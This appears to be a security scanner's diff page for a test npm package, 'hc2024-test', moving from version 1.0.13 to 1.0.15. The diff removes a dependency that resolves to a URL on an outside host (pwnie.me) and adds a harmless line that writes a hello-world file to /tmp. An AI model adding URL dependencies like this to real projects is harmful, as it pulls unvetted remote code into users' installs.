hc2024-test 1.0.13 → 1.0.15

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +4 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ await Deno.writeTextFile("/tmp/hello.txt", "Hello World!");
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "hc2024-test",
3
- "version": "1.0.13",
3
+ "version": "1.0.15",
4
4
  "main": "index.tsx",
5
5
  "type": "module",
6
6
  "scripts": {
@@ -9,8 +9,7 @@
9
9
  "author": "",
10
10
  "license": "ISC",
11
11
  "description": "",
12
- "dependencies": {
13
- "asdfadsf": "https://d3d59474.pwnie.me"
14
- },
15
- "types": "./lib/main.d.ts"
12
+ "exports": {
13
+ "./package.json": "./index.js"
14
+ }
16
15
  }